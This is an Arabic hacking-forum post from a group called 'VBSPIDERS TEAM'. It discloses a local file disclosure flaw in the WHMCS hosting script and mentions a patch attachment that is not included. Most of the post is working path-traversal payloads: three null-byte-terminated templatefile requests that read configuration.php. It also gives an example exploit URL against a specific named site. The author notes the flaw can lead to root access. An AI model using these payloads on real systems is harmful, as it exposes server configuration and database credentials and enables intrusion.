KaLa$nikoV
<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع
السلام عليكم ورحمه الله وبركاته
الثغره بسيطه ومنتشره من زمان بين الشباب ع الايميل
لكن في حد حب ينشرها لمواقع السكيورتي الله يهديه
(رح تترقع هيك الثغره )
خطوره الثغره كبيره لانك ممكن توصل للروت
الاستغلال
بتقرا الكونفج بالسورس كود للصفحه
مثال
افتح اللنك وبعد افتح السورس كود بتلقى بينات الكونفج
اتوقع الشرح مفهوم خاصه مع المثال
وترقيع الثغره بالمرفقات
ارفع المرفق بداخل سكربت whmcs
واستبدله بالملف الاصلي
بامان الله ورعايته
الثغره بسيطه ومنتشره من زمان بين الشباب ع الايميل
لكن في حد حب ينشرها لمواقع السكيورتي الله يهديه
(رح تترقع هيك الثغره )
خطوره الثغره كبيره لانك ممكن توصل للروت
الاستغلال
PHP:
cart.php?a=test&templatefile=../../../configuration.php%00
submitticket.php?step=test&templatefile=../../../configuration.php%00
downloads.php?action=test&templatefile=../../../configuration.php%00مثال
PHP:
https://storm-servers.net/whmcs/cart.php?a=test&templatefile=../../../configuration.php%00اتوقع الشرح مفهوم خاصه مع المثال
وترقيع الثغره بالمرفقات
ارفع المرفق بداخل سكربت whmcs
واستبدله بالملف الاصلي
بامان الله ورعايته
التعديل الأخير بواسطة المشرف:
